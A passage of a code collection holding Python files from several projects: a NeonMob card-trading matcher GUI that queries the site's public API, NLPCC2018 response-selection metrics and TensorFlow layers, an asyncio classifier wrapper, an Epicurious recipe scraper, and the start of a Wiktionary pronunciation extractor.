current_rows = window['-CARDTABLE-'].get()
new_rows = sorted(current_rows, key=lambda rowx: rowx[1])
window['-CARDTABLE-'].update(new_rows)
# Result window
if window == window4 and event in ('OK', sg.WIN_CLOSED): # Close the result window if it is closed or OK is pressed
window4.close()
window4 = None
continue
if window == window4 and event == '-PEOPLETABLE-' and len(values['-PEOPLETABLE-']): # Update the two bottom tables when a result from the top table is selected
index = values['-PEOPLETABLE-'][0]
owned = []
# noinspection PyTypeChecker
for ownedcard in RESULTS[index]['owns']:
owned.append(
[ownedcard['rarity'], ownedcard['card_name'], ownedcard['set_name'], ownedcard['print_count'],
ownedcard['card_id']])
wanted = []
# noinspection PyTypeChecker
for wantedcard in RESULTS[index]['wants']:
wanted.append(
[wantedcard['rarity'], wantedcard['card_name'], wantedcard['set_name'], 'Yes' if wantedcard['wishlisted'] else 'No',
wantedcard['card_id']])
window['-OWNTABLE-'].update(owned)
window['-WANTTABLE-'].update(wanted)
# noinspection PyTypeChecker
window['-OTHERFRAME-'].update(value=RESULTS[index]['name'] + " Has:")
window['-PRINTNUMS-'].update(value='')
elif event == '-OWNTABLE-' and len(values['-OWNTABLE-']) and len(values['-PEOPLETABLE-']): # Display print numbers when a card in the bottom left table is selected
cardindex = values['-OWNTABLE-'][0]
personindex = values['-PEOPLETABLE-'][0]
# noinspection PyTypeChecker
userid = RESULTS[personindex]['id']
cardid = window['-OWNTABLE-'].get()[cardindex][4]
data = requests.request('GET', 'https://www.neonmob.com/api/users/' + str(userid) + '/piece/' + str(cardid) + '/detail/').json()
# print(data['refs'][data['payload'][1]]['prints'])
prints = []
for copy in data['refs'][data['payload'][1]]['prints']:
prints.append(copy['print_num'])
window['-PRINTNUMS-'].update(value='Print Numbers: ' + ', '.join(str(i) for i in prints))
if window == window4 and event == 'Open User Profile' and len(values['-PEOPLETABLE-']): # Open a user's profile when a user from the result list is selected and the button is pressed
index = values['-PEOPLETABLE-'][0]
# noinspection PyTypeChecker
webbrowser.open_new_tab('https://www.neonmob.com/user/' + str(RESULTS[index]['id']))
# Settings window
if window == settingswindow and event == 'OK': # Saves settings when OK is pressed
setdbpath = values['-SETDBPATH-']
AUTOUPDATE = bool(values['-AUTOUPDATE-'])
keepalivemins = int(values['-KEEPALIVE-'])
MAXRECENT = int(values['-MAXRECENT-'])
saveSettings()
sg.popup("Settings saved!")
settingswindow.close()
settingswindow = None
continue
elif window == settingswindow and event in ('Cancel', sg.WIN_CLOSED): # Closes the settings window when it is closed or Cancel is pressed
settingswindow.close()
settingswindow = None
continue
# Make sure all other windows get closed when the program "shuts down" (breaks out of the main loop)
window1.close()
if window2 is not None:
window2.close()
if window3 is not None:
window3.close()
if window4 is not None:
window4.close()
if settingswindow is not None:
settingswindow.close()
if __name__ == '__main__':
main()
```
#### File: neonmobmatcher/old-dev/core.py
```python
import requests
from conditional import conditional
from alive_progress import alive_bar
import time
import json
from os import path
from timeit import default_timer as timer
SCACHE = {}
OCACHE = {}
keepalivemins = 10
setdbpath = "db.json"
SETDB = {}
def loadSetDB():
global SETDB
with open(setdbpath, 'r') as f:
SETDB = json.load(f)
def printseries(serieslist):
for series in serieslist:
print(series['name'] + ' (' + str(series['id']) + ') by ' + series['creator']['username'] + ': ' + series['difficulty'] + ' ' + series['edition_size'] + ' series')
def searchDB(query):
global SETDB
start = timer()
if SETDB == {}:
loadSetDB()
filtered = list(filter(lambda series: query.lower() in series['name'].lower() or query.lower() in series['name_slug'].lower() or query.lower() in series['creator']['username'].lower() or query.lower() in series['creator']['name'], SETDB))
filtered.reverse()
printseries(filtered)
end = timer()
print(str(len(filtered)) + " results in " + str(end - start))
def loadCache():
global SCACHE, OCACHE
with open('cache/scache.json', 'r') as f:
SCACHE = json.load(f)
with open('cache/ocache.json', 'r') as f:
OCACHE = json.load(f)
def purgeCache():
global SCACHE, OCACHE
loadCache()
currentMillis = int(round(time.time() * 1000))
for k in list(SCACHE.keys()):
if currentMillis - SCACHE[k]['time'] >= (keepalivemins * 60 * 1000):
del SCACHE[k]
for k in list(OCACHE.keys()):
if currentMillis - OCACHE[k]['time'] >= (keepalivemins * 60 * 1000):
del OCACHE[k]
saveCache()
def saveCache():
global SCACHE, OCACHE
with open('cache/scache.json', 'w') as f:
json.dump(SCACHE, f)
with open('cache/ocache.json', 'w') as f:
json.dump(OCACHE, f)
def loadCards(setid):
if path.exists('cache/cards/' + str(setid) + '.json'):
with open('cache/cards/' + str(setid) + '.json', 'r') as f:
cards = json.load(f)
return cards
else:
return 0
def saveCards(setid, cards):
with open('cache/cards/' + str(setid) + '.json', 'w') as f:
json.dump(cards, f)
def GetCards(setid, showBar, force=False):
cards = loadCards(setid)
if cards != 0 and not force:
print("Card found in cache")
return cards
set_url = "https://www.neonmob.com/api/setts/" + str(setid) + "/"
data = requests.request('GET', set_url).json()
set_name = data['name']
total = 0
for cat in range(len(data['core_stats'])):
total += data['core_stats'][cat]['total']
for cat in range(len(data['special_stats'])):
total += data['special_stats'][cat]['total']
print("\nGetting cards from series \"" + set_name + "\"...")
cards = []
nxt = "/api/sets/" + str(setid) + "/pieces/"
with conditional(showBar, alive_bar(total, bar='smooth', spinner='dots_recur')) as bar:
first = True
while True:
raw = requests.request('GET', "https://www.neonmob.com" + nxt)
if raw.status_code == 500 and first:
print("Using fallback card endpoint...")
raw = requests.request('GET', "https://www.neonmob.com/api/sets/" + str(setid) + "/piece-names")
data = raw.json()
for card in data:
cards.append({'name': card['name'],
'id': card['id'],
'setName': set_name})
if showBar:
bar()
if not showBar:
print('...', end="", flush=True)
break
else:
data = raw.json()
nxt = data['payload']['metadata']['resultset']['link']['next']
for card in data['payload']['results']:
cards.append({'name': card['name'],
'id': card['id'],
'setName': set_name})
if showBar:
bar()
if not showBar:
print(". ", end="", flush=True)
first = False
if not nxt:
break
saveCards(setid, cards)
return cards
def GetSeekers(card, showBar, force=False):
global SCACHE
purgeCache()
if card['id'] == -1:
print("\nCouldn't find card " + card['name'] + " in set " + card['setName'])
return []
currentMillis = int(round(time.time() * 1000))
if str(card['id']) in SCACHE.keys() and not force:
print("Card is in cache")
if currentMillis - SCACHE[str(card['id'])]['time'] < (keepalivemins * 60 * 1000):
print("Time is under 10 minutes")
return SCACHE[str(card['id'])]['seekers']
print("\nGetting seekers of " + card['name'] + " [" + str(card['id']) + "]...")
seekers = []
data = requests.request('GET', "https://www.neonmob.com/api/pieces/" + str(card['id']) + "/needers/?completion=desc&grade=desc&wishlist=desc").json()
total = data['count']
with conditional(showBar, alive_bar(total, bar='smooth', spinner='dots_recur')) as bar:
while True:
nxt = data['next']
for seeker in data['results']:
seekers.append({'id': seeker['id'],
'name': seeker['name'],
'trader_score': seeker['trader_score'],
'wishlisted': seeker['wishlisted'],
'needs_special_piece_count': seeker['special_piece_count'],
'needs_owned_special_piece_count': seeker['owned_special_piece_count'],
'needs_owned_percentage': seeker['owned_percentage']})
if showBar:
bar()
if not showBar:
print(". ", end="", flush=True)
if not nxt:
break
data = requests.request('GET', "https://www.neonmob.com" + nxt).json()
try:
SCACHE.pop(str(card['id']))
except KeyError:
print("Card is not in cache")
currentMillis = int(round(time.time() * 1000))
SCACHE.update({card['id']: {'time': currentMillis, 'cardName': card['name'], 'setName': card['setName'], 'seekers': seekers}})
saveCache()
return seekers
def GetOwners(card, showBar, force=False):
global OCACHE
purgeCache()
if card['id'] == -1:
print("\nCouldn't find card " + card['name'] + " in set " + card['setName'])
return []
currentMillis = int(round(time.time() * 1000))
if str(card['id']) in OCACHE.keys() and not force:
print("Card is in cache")
if currentMillis - OCACHE[str(card['id'])]['time'] < (keepalivemins * 60 * 1000):
print("Time is under 10 minutes")
return OCACHE[str(card['id'])]['owners']
print("\nGetting owners of " + card['name'] + " [" + str(card['id']) + "]...")
owners = []
data = requests.request('GET', "https://www.neonmob.com/api/pieces/" + str(card['id']) + "/owners/?completion=asc&grade=desc&owned=desc").json()
total = data['count']
with conditional(showBar, alive_bar(total, bar='smooth', spinner='dots_recur')) as bar:
while True:
nxt = data['next']
for owner in data['results']:
owners.append({'id': owner['id'],
'name': owner['name'],
'trader_score': owner['trader_score'],
'print_count': owner['print_count'],
'has_special_piece_count': owner['special_piece_count'],
'has_owned_special_piece_count': owner['owned_special_piece_count'],
'has_owned_percentage': owner['owned_percentage'],
'has_card_name': card['name'],
'has_card_set_name': card['setName']})
if showBar:
bar()
if not showBar:
print(". ", end="", flush=True)
if not nxt:
break
data = requests.request('GET', "https://www.neonmob.com" + nxt).json()
try:
OCACHE.pop(str(card['id']))
except KeyError:
print("Card is not in cache")
currentMillis = int(round(time.time() * 1000))
OCACHE.update({card['id']: {'time': currentMillis, 'cardName': card['name'], 'setName': card['setName'], 'owners': owners}})
saveCache()
return owners
def main():
card = {'name': "<NAME>", 'id': 56093, 'setName': "RANDOM! the Comic TCC"}
# GetSeekers(card, True, force=True)
# GetOwners(card, True)
# GetCards(5908, True)
# purgeCache()
searchDB("art")
if __name__ == '__main__':
main()
```
#### File: neonmobmatcher/old-dev/gui5a.py
```python
import PySimpleGUI as sg
import json
sg.theme('DarkGrey9')
setdbpath = "db.json"
SETDB = {}
IDS = []
NAMES = []
def loadSetDB():
global SETDB
with open(setdbpath, 'r') as f:
SETDB = json.load(f)
def searchDB(query):
global SETDB
if SETDB == {}:
loadSetDB()
filtered = list(filter(lambda series: query.lower() in series['name'].lower() or query.lower() in series['name_slug'].lower(), SETDB))
# filtered = list(filter(lambda series: query.lower() in series['creator']['username'].lower() or query.lower() in series['creator']['name'].lower(), SETDB))
filtered.reverse()
return filtered
def processResults(results):
global IDS, NAMES
IDS = []
NAMES = []
for item in results:
IDS.append(item['id'])
NAMES.append(item['name'])
default = []
layout = [[sg.Input(size=(30, 1), enable_events=True, key='-INPUT-', tooltip='Search for a set by name', focus=True)],
[sg.Listbox(default, size=(30, 15), key='-LIST-')],
[sg.Button('OK'), sg.Button('Exit')]]
window = sg.Window('Listbox with Search', layout)
while True:
event, values = window.read()
print(event, values)
if event in (sg.WIN_CLOSED, 'Exit'):
break
if values['-INPUT-'] != '':
search = values['-INPUT-']
new_values = searchDB(search)
processResults(new_values)
window['-LIST-'].update(NAMES)
else:
window['-LIST-'].update(default)
if event == 'OK' and len(values['-LIST-']):
index = NAMES.index(values['-LIST-'][0])
sg.popup('Selected ', IDS[index])
# 22471 The Cabcuas
# 5682 Learn Your ABC's
window.close()
```
#### File: neonmobmatcher/old-dev/gui5c.py
```python
import PySimpleGUI as sg
import json
from os import path
import requests
sg.theme('DarkGrey9')
def loadCards(setid):
if path.exists('cache/cards/' + str(setid) + '.json'):
with open('cache/cards/' + str(setid) + '.json', 'r') as f:
cards = json.load(f)
return cards
else:
return 0
def saveCards(setid, cards):
with open('cache/cards/' + str(setid) + '.json', 'w') as f:
json.dump(cards, f)
def GetCards(setid, force=False):
cards = loadCards(setid)
if cards != 0 and not force:
print("Card found in cache")
return cards
set_url = "https://www.neonmob.com/api/setts/" + str(setid) + "/"
data = requests.request('GET', set_url).json()
set_name = data['name']
# total = 0
# for cat in range(len(data['core_stats'])):
# total += data['core_stats'][cat]['total']
# for cat in range(len(data['special_stats'])):
# total += data['special_stats'][cat]['total']
# print("\nGetting cards from series \"" + set_name + "\"...")
cards = []
raw = requests.request('GET', "https://www.neonmob.com/api/sets/" + str(setid) + "/piece-names")
data = raw.json()
for card in data:
cards.append({'name': card['name'],
'rarity': card['rarity']['name'],
'id': card['id'],
'setName': set_name})
saveCards(setid, cards)
return cards
def processCards(results):
rows = []
for item in results:
rows.append([item['rarity'], item['name'], item['setName'], item['id']])
return rows
defaultcards = [['', '', '']]
setid = int(sg.popup_get_text('Enter a series id'))
layout = [[sg.Table(defaultcards, num_rows=15, key='-CARDTABLE-', headings=['Rarity', 'Card Name', 'Set Name', 'id'], col_widths=[10, 30, 30, 9], auto_size_columns=False, justification='left', visible_column_map=[True, True, False, False], right_click_menu=['&Right', ['Sort By Rarity', 'Sort By Name']])],
[sg.Button('OK'), sg.Button('Exit'), sg.Button('Refresh')]]
window = sg.Window('Card Selection', layout, finalize=True)
new_rows = processCards(GetCards(setid))
window['-CARDTABLE-'].update(new_rows)
while True:
event, values = window.read()
print(event, values)
if event in (sg.WIN_CLOSED, 'Exit'):
break
elif event == 'Refresh':
new_rows = processCards(GetCards(setid, force=True))
window['-CARDTABLE-'].update(new_rows)
elif event == 'Sort By Rarity':
current_rows = window['-CARDTABLE-'].get()
new_rows = []
for rarity in ['Common', 'Uncommon', 'Rare', 'Very Rare', 'Extra Rare', 'Chase', 'Variant']:
for row in current_rows:
if row[0] == rarity:
new_rows.append(row)
window['-CARDTABLE-'].update(new_rows)
elif event == 'Sort By Name':
current_rows = window['-CARDTABLE-'].get()
new_rows = sorted(current_rows, key=lambda card: card[1])
window['-CARDTABLE-'].update(new_rows)
window.close()
```
#### File: neonmobmatcher/old-dev/gui5d.py
```python
import requests
import PySimpleGUI as sg
def GetOwners(card, force=False):
if card['id'] == -1:
print("\nCouldn't find card " + card['name'] + " in set " + card['setName'])
return []
# currentMillis = int(round(time.time() * 1000))
# if str(card['id']) in OCACHE.keys() and not force:
# print("Card is in cache")
# if currentMillis - OCACHE[str(card['id'])]['time'] < (keepalivemins * 60 * 1000):
# print("Time is under 10 minutes")
# return OCACHE[str(card['id'])]['owners']
print("\nGetting owners of " + card['name'] + " [" + str(card['id']) + "]...")
owners = []
data = requests.request('GET', "https://www.neonmob.com/api/pieces/" + str(card['id']) + "/owners/?completion=asc&grade=desc&owned=desc").json()
total = data['count']
i = 0
while True:
nxt = data['next']
for owner in data['results']:
owners.append({'id': owner['id'],
'name': owner['name'],
'trader_score': owner['trader_score'],
'owns': [
{
'card_id': card['id'],
'card_name': card['name'],
'set_name': card['setName'],
'print_count': owner['print_count'],
'total_specials': owner['special_piece_count'],
'specials': owner['owned_special_piece_count'],
'percentage': owner['owned_percentage']
}
],
'wants': []
})
i += 1
sg.one_line_progress_meter('My progress meter', i, total, "Getting owners of " + card['name'] + " [" + str(card['id']) + "]...", orientation='h')
if not nxt:
break
data = requests.request('GET', "https://www.neonmob.com" + nxt).json()
return owners
def GetSeekers(card, force=False):
if card['id'] == -1:
print("\nCouldn't find card " + card['name'] + " in set " + card['setName'])
return []
print("\nGetting seekers of " + card['name'] + " [" + str(card['id']) + "]...")
seekers = []
data = requests.request('GET', "https://www.neonmob.com/api/pieces/" + str(card['id']) + "/needers/?completion=desc&grade=desc&wishlist=desc").json()
total = data['count']
i = 0
while True:
nxt = data['next']
for seeker in data['results']:
seekers.append({'id': seeker['id'],
'name': seeker['name'],
'trader_score': seeker['trader_score'],
'wants': [
{
'card_id': card['id'],
'card_name': card['name'],
'set_name': card['setName'],
'wishlisted': seeker['wishlisted'],
'total_specials': seeker['special_piece_count'],
'specials': seeker['owned_special_piece_count'],
'percentage': seeker['owned_percentage']
}
],
'owns': []
})
i += 1
sg.one_line_progress_meter('My progress meter', i, total, "Getting seekers of " + card['name'] + " [" + str(card['id']) + "]...", orientation='h')
if not nxt:
break
data = requests.request('GET', "https://www.neonmob.com" + nxt).json()
return seekers
card1 = {'name': "<NAME>", 'id': 56093, 'setName': "RANDOM! the Comic TCC"}
GetSeekers(card1)
``` |
{
"source": "JoJoJun/NLPCC2018_Multi_Turn_Response_Selection",
"score": 3
} |
#### File: JoJoJun/NLPCC2018_Multi_Turn_Response_Selection/Evaluate.py
```python
from sklearn.metrics import classification_report
def ComputeR10_1(scores,labels,count = 11):
total = 0
correct = 0
for i in range(len(labels)):
if labels[i] == 1:
total = total+1
sublist = scores[i:i+count]
if max(sublist) == scores[i]:
correct = correct + 1
return str(float(correct)/ total)
def ComputeR2_1(scores,labels,count = 2):
total = 0
correct = 0
for i in range(len(labels)):
if labels[i] == 1:
total = total+1
sublist = scores[i:i+count]
if max(sublist) == scores[i]:
correct = correct + 1
return str(float(correct)/ total)
def precision_of_classification(pred_label,true_label,class_num=2):
assert class_num==2,'You should design this function for your own task.'
return classification_report(true_label, pred_label, target_names=['not_match','can_match'])
def mrr_and_rnk(pred_score,true_label,response_num_per_query=11,k=[1,2,3,4,5]):
#一个query只有一个正确的response的时候用这个
assert len(pred_score) == len(true_label), 'length not same'
result_of_rnk=[0.0]*len(k)
p=0
sample_num=len(true_label)
total_q_num=0.0
mrr_result=0.0
while p<sample_num:
one_q_p = pred_score[p:p + response_num_per_query]
one_q_t = true_label[p:p + response_num_per_query]
right_index = [i for i in range(0, len(one_q_t)) if one_q_t[i] == 1]
assert len(right_index) == 1, 'true label is not right'
pred_of_right_sample = one_q_p[right_index[0]]
index_of_value_of_bigger_than_valueof_oneqp_of_location_rightindex = [i for i in range(0, len(one_q_p)) if
pred_of_right_sample <= one_q_p[i]] #
mrr_result+=1.0/len(index_of_value_of_bigger_than_valueof_oneqp_of_location_rightindex)
rank=len(index_of_value_of_bigger_than_valueof_oneqp_of_location_rightindex)
for i in range(0,len(k)):
if rank<=k[i]:
result_of_rnk[i]+=1
total_q_num += 1
p += response_num_per_query
mrr_result=mrr_result/total_q_num
result_of_rnk=[r/total_q_num for r in result_of_rnk]
return mrr_result,result_of_rnk
def precision_of_matching_1(pred_label,true_label,response_num_per_query=11):
assert len(pred_label)==len(true_label),'length not same'
p=0
sample_num=len(true_label)
right_q_num=0.0
total_q_num=0.0
while p<sample_num:
one_q_p=pred_label[p:p+response_num_per_query]
one_q_t=true_label[p:p+response_num_per_query]
right_index=[i for i in range(0,len(one_q_t)) if one_q_t[i]==1]
assert len(right_index)==1,'true label is not right'
tmp=one_q_p[right_index[0]]
index_of_value_of_bigger_than_valueof_oneqp_of_location_rightindex=[i for i in range(0,len(one_q_p)) if tmp<=one_q_p[i]]#
if len(index_of_value_of_bigger_than_valueof_oneqp_of_location_rightindex)==1:
right_q_num+=1
total_q_num+=1
p+=response_num_per_query
return right_q_num,total_q_num
def map_and_rnk(pred_score,true_label,response_num_per_query=11,k=[1,2,3,4,5]):
#todo 一个query有多个正确的response时用这个
pass
```
#### File: JoJoJun/NLPCC2018_Multi_Turn_Response_Selection/Layers.py
```python
import tensorflow as tf
import pickle
import utils
from tensorflow.contrib.layers import xavier_initializer
from tensorflow.contrib import rnn
from tensorflow.python.keras.preprocessing.sequence import pad_sequences
import numpy as np
class sp_interactive_layer:
def __init__(self,input_tensor,channels=2,filter_num=8,kernel_size=(3,3),pool_size=(2,2),strides=(2,2),con_times=1):
input_dims=input_tensor.shape[2]
self.W=tf.get_variable('sp_w',shape=(input_dims,channels,input_dims),
initializer=xavier_initializer(), dtype=tf.float32)
# input_tensor shape is (batchsize,m,n),we calculate an image with shape (batch_size,m,m,channels)
tmp = tf.tensordot(input_tensor, self.W, axes=[[2], [0]])#batchsize,m,channels,n
mv_t = tf.transpose(input_tensor, perm=[0, 2, 1])#batchsize,n,m
mv_t = tf.stack([mv_t] * channels, axis=1)#batchsize,channels,n,m
matching_image = tf.matmul(tf.transpose(tmp, perm=[0, 2, 1, 3]), mv_t)#batchsize,channels,n,n
matching_image = tf.transpose(matching_image, perm=[0, 2, 3, 1])#batchsize,n,n,channels
for i in range(0,con_times):
conv_layer = tf.layers.conv2d(matching_image, filters=filter_num, kernel_size=kernel_size, padding='VALID',
kernel_initializer=tf.contrib.keras.initializers.he_normal(),
activation=tf.nn.leaky_relu, name='conv_'+str(i)) # TODO: check other params
matching_image = tf.layers.max_pooling2d(conv_layer, pool_size=pool_size, strides=strides,
padding='VALID', name='max_pooling_'+str(i)) # TODO: check other params
self.final_matching_vector=tf.contrib.layers.flatten(matching_image)
def call(self):
return self.final_matching_vector
```
#### File: JoJoJun/NLPCC2018_Multi_Turn_Response_Selection/preprocess_for_test_nlpcc2018.py
```python
import random
from Tokenizer import Tokenizer
import numpy as np
import pickle
import word2vec
import Evaluate
def load_context_data(path='./nlpcc2018test/seq_context.txt'):
contexts=[]
with open(path,'r',encoding='utf-8') as f:
a_context=[]
for line in f:
string=line.strip('\r\n').strip('\n')
if len(string)==0:
if len(a_context)==0:
continue
else:
contexts.append(a_context)
a_context=[]
else:
a_context.append(string)
return contexts
def load_responses_data(path='./nlpcc2018test/seq_replies.txt'):
all_context_responses=[]
with open(path,'r',encoding='utf-8') as f:
one_context_responses=[]
for line in f:
string=line.strip('\r\n').strip('\n')
if len(string)==0:
if len(one_context_responses)==0:
continue
else:
all_context_responses.append(one_context_responses)
one_context_responses=[]
else:
one_context_responses.append(string)
return all_context_responses
def gen_raw_test_data(store_path='./nlpcc2018test/test.raw.pkl',add_sen=False):
contexts=load_context_data()
all_context_response=load_responses_data()
assert len(contexts)==len(all_context_response),'test data num error'
tmp=np.array([len(r) for r in all_context_response])
wrong_index=[i for i in range(0,len(tmp)) if tmp[i]!=10]
wrong_contents=[all_context_response[i] for i in range(0,len(tmp)) if tmp[i]!=10]
if add_sen:
addition_string = 'nlpcc2018错误,异常。补齐候选句子。aaaaaa'
for i in range(0,len(tmp)):
if tmp[i]!=10:#统计过了nlpcc2018的数据不是10就是9。有几个9的。9是错误的。
all_context_response[i].append(addition_string)
new_context=[]
new_response=[]
for i in range(0,len(contexts)):
for j in range(0,tmp[i]):
new_context.append(contexts[i])
for context_responses in all_context_response:
for r in context_responses:
new_response.append(r)
assert len(new_context)==len(new_response),'new_context or new_response length error'
pickle.dump([new_context,new_response],open(store_path,'wb+'),protocol=True)
pickle.dump(tmp,open('./nlpcc2018test/reponses_num_of_context.pkl','wb+'),protocol=True)
pickle.dump([wrong_contents,wrong_index], open('./nlpcc2018test/wrong_contents_and_index.pkl', 'wb+'), protocol=True)
return new_context,new_response
def get_seged_test_data(raw_data,store_path='./nlpcc2018test/test.seg.pkl'):
raw_context, raw_response=raw_data
tokenizer=Tokenizer()
seged_context=[]
seged_response=[]
for con in raw_context:
one_seged_con=[]
for utt in con:
one_seged_con.append(tokenizer.parser(utt).split())
seged_context.append(one_seged_con)
for r in raw_response:
seged_response.append(tokenizer.parser(r).split())
pickle.dump([seged_context,seged_response],open(store_path,'wb+'),protocol=True)
return seged_context,seged_response
def get_final_test_data_without_unk(seg_context,seg_response,word_dict,store_path='./nlpcc2018test/test.pkl'):
index_context=[]
index_response=[]
for con in seg_context:
index_one_con=[]
for utt in con:
index_one_utt=[word_dict[word] for word in utt if word in word_dict]
index_one_con.append(index_one_utt)
index_context.append(index_one_con)
for r in seg_response:
index_one_r=[word_dict[word] for word in r if word in word_dict]
index_response.append(index_one_r)
pickle.dump([index_context,index_response],open(store_path,'wb+'),protocol=True)
def load_word_embedding():
# word_embedding:[clusters=None,vectors,vocab,vocab_hash]
word_embedding = word2vec.load('./data/word_embedding.bin')
return word_embedding
def gen_result_readable():
reponses_num_of_context=pickle.load(open('./nlpcc2018test/reponses_num_of_context.pkl','rb'))
final_result=pickle.load(open('./nlpcc2018result/final.pkl','rb'))
contexts = load_context_data()
all_context_response = load_responses_data()
p=0
with open('./nlpcc2018result/final.readable.txt','w+') as f:
for i in range(0,len(contexts)):
num=reponses_num_of_context[i]
tmp=final_result[p:p+num]
tmp=[[tmp[i],i] for i in range(0,len(tmp))]
tmp.sort(reverse=True)
f.write('id='+str(i)+'\n')
for utt in contexts[i]:
f.write(utt+'\n')
f.write('responses ranking:\n')
for score,index in tmp:
f.write(str(index)+' '+str(score)+' '+all_context_response[i][index]+'\n')
f.write('\n')
p+=num
assert p==len(final_result),'gen_result_readable error'
def load_true_label():
label=[]
with open('./nlpcc2018result/sub2-index.txt') as f:
for line in f:
label.append(int(line.strip('\r\n').strip('\n')))
return label
if __name__=='__main__':
#gen_raw_test_data()
#seg_context,seg_response=get_seged_test_data(gen_raw_test_data(add_sen=False))
#word_embedding=load_word_embedding()
#get_final_test_data_without_unk(seg_context=seg_context,seg_response=seg_response,word_dict=word_embedding.vocab_hash)
#gen_result_readable()
label = load_true_label()
all_result = pickle.load(open('./nlpcc2018result/all.pkl', 'rb'))
wrong_contents_and_index=pickle.load(open('./nlpcc2018test/wrong_contents_and_index.pkl','rb'))
test_raw=pickle.load(open('./nlpcc2018test/test.raw.pkl','rb'))
final_result = pickle.load(open('./nlpcc2018result/final.pkl', 'rb'))
new_all_rst = []
for rst in all_result[0]:
tmp = list(rst)
new_all_rst.append(tmp)
new_final_result=list(final_result)
for index in wrong_contents_and_index[1]:
for rst in new_all_rst:
rst.insert(index*10+9,0.0)
new_final_result.insert(index*10+9,0.00001)
new_label=[]
for l in label:
new_label+=[int(l==i) for i in range(0,10)]
for i in range(0,len(all_result[0])):
print(Evaluate.mrr_and_rnk(new_all_rst[i],new_label,response_num_per_query=10))
print(Evaluate.mrr_and_rnk(new_final_result,new_label,response_num_per_query=10))
print('all work has finished')
``` |
{
"source": "jojolebarjos/food-ontology",
"score": 3
} |
#### File: parser/classifier/classifier.py
```python
import asyncio
# Abstract asynchronous classifier interface
class Classifier:
# Provide annotation for specified texts
async def classify(self, texts):
raise NotImplementedError()
# Ask for retraining (old model should be available during training)
async def train(self):
pass
```
#### File: parser/classifier/delay.py
```python
import asyncio
from .classifier import Classifier
# Chain coroutines
async def then(fence, task):
await fence
return await task
# Avoid overlapping training sessions
class DelayedClassifier(Classifier):
def __init__(self, classifier):
self._classifier = classifier
self._lock = asyncio.Lock()
self._training_future = None
self._pending_future = None
# Annotate given samples
async def classify(self, texts):
return await self._classifier.classify(texts)
# Schedule training session
async def train(self):
async with self._lock:
# If no training session is running, just do it
if self._training_future is None:
future = asyncio.ensure_future(self._train())
self._training_future = future
# Otherwise, if there is no session scheduled, prepare it
elif self._pending_future is None:
future = asyncio.ensure_future(then(self._training_future, self._classifier.train()))
self._pending_future = future
# Otherwise, just wait on scheduled training
else:
future = self._pending_future
# Wait for it
return await future
# Train and then trigger any scheduled session
async def _train(self):
status = await self._classifier.train()
async with self._lock:
self._training_future = self._pending_future
self._pending_future = None
return status
```
#### File: food/scraper/epicurious.py
```python
import scrapy
# Basic crawler for Epicurious recipes
class EpicuriousSpider(scrapy.Spider):
name = 'epicurious'
# Acquire all recipes in expected identifier range
def start_requests(self):
for id in range(1, 6010):
yield scrapy.Request('https://www.epicurious.com/recipes/food/views/%d' % id)
# Do the parsing
def parse(self, response):
# Get main identifiers
url = response.url
try:
id = int(url[url.rindex('-')+1:])
except:
return
# Get title
title = response.selector.xpath('//h1/text()').extract_first()
title = title.strip()
# Source
# TODO author/date/source...
# Rating
rating_min = response.selector.xpath('//*[@itemprop="worstRating"]/@content').extract_first()
rating_max = response.selector.xpath('//*[@itemprop="bestRating"]/@content').extract_first()
rating_value = response.selector.xpath('//*[@itemprop="ratingValue"]/@content').extract_first()
rating = float(rating_value) / (float(rating_max) - float(rating_min))
# Get description
description = response.selector.xpath('//*[@itemprop="description"]/p/text()').extract_first()
# Yield
servings = response.selector.xpath('//*[@itemprop="recipeYield"]/text()').extract_first()
# Ingredients
# TODO might use class="ingredient-group" to get subgroups
ingredients = response.selector.xpath('//*[@itemprop="ingredients"]/text()').extract()
# Preparation
# TODO directives
# Nutritional information
calories = response.selector.xpath('//*[@itemprop="calories"]/text()').extract_first()
carbohydrates = response.selector.xpath('//*[@itemprop="carbohydrateContent"]/text()').extract_first()
fat = response.selector.xpath('//*[@itemprop="fatContent"]/text()').extract_first()
protein = response.selector.xpath('//*[@itemprop="proteinContent"]/text()').extract_first()
sodium = response.selector.xpath('//*[@itemprop="sodiumContent"]/text()').extract_first()
polyunsaturated_fat = response.selector.xpath('//*[text()="Polyunsaturated Fat"]/../*[@class="nutri-data"]/text()').extract_first()
fiber = response.selector.xpath('//*[@itemprop="fiberContent"]/text()').extract_first()
monounsaturated_fat = response.selector.xpath('//*[text()="Monounsaturated Fat"]/../*[@class="nutri-data"]/text()').extract_first()
cholesterol = response.selector.xpath('//*[@itemprop="cholesterolContent"]/text()').extract_first()
# Tags
tags = response.selector.xpath('//*[@itemprop="recipeCategory"]/text()').extract()
# Return result
yield {
'id' : id,
'url' : url,
'title' : title,
'ingredients' : ingredients
# TODO more properties
}
``` |
{
"source": "jojolebarjos/wiktionary-phoneme",
"score": 3
} |
#### File: jojolebarjos/wiktionary-phoneme/extract.py
```python
import io
import os
import bz2
from lxml import etree
from tqdm import tqdm
import re
import csv
#
# English-specific parser
#
# Common pronunciation definition
# * {{a|RP}} {{IPA|/pɔːtˈmæn.təʊ/|lang=en}}
# * {{a|US}} {{enPR|pôrtmă'ntō}}, {{IPA|/pɔːɹtˈmæntoʊ/|lang=en}}; {{enPR|pô'rtmăntōʹ}}, {{IPA|/ˌpɔːɹtmænˈtoʊ/|lang=en}}
# * {{a|Portugal}} {{IPA|/ˈfɾɐj/|/ˈfɾej/|lang=pt}}
# * {{a|US|UK}} {{IPA|/kæt/|[kʰæt]|[kʰæt̚]|lang=en}}
# * {{a|Munster|Aran}} {{IPA|/kɑt̪ˠ/|lang=ga}}
r_en_ipa = re.compile(r'\{\{IPA\|\/([^\/]*)\/.*?(?:lang=([^\}]*))?\}\}', re.UNICODE)
# Extract phonemes from the whole article
def parse_en(title, text):
# Iterate over lines
results = []
for line in text.split('\n'):
# Check standard pronunciation definition
match = r_en_ipa.search(line)
if match is not None:
pronunciation = match.group(1)
language = match.group(2) or ''
result = (title, language, pronunciation)
results.append(result)
# Ready
return results
#
# French-specific parser
#
# Common pronunciation definition
# * {{pron|ʃɛz|fr}}
# TODO
# Common pronunciation definition, with text
# '''lire''' {{pron|liʁ|fr}}
# '''manga''' {{pron|mɑ̃.ɡa|fr}}
r_fr_pron_long = re.compile(r'\'\'\'([^\{]*)\'\'\'\s*\{\{pron\|([^\|]*)\|([^\}]*)\}\}', re.UNICODE)
# Alternative pronunciation definition
# {{fr-rég|mœbl}}
# {{en-nom-rég|ˌɑː(ɹ)m.ˈtʃeə(ɹ)}}
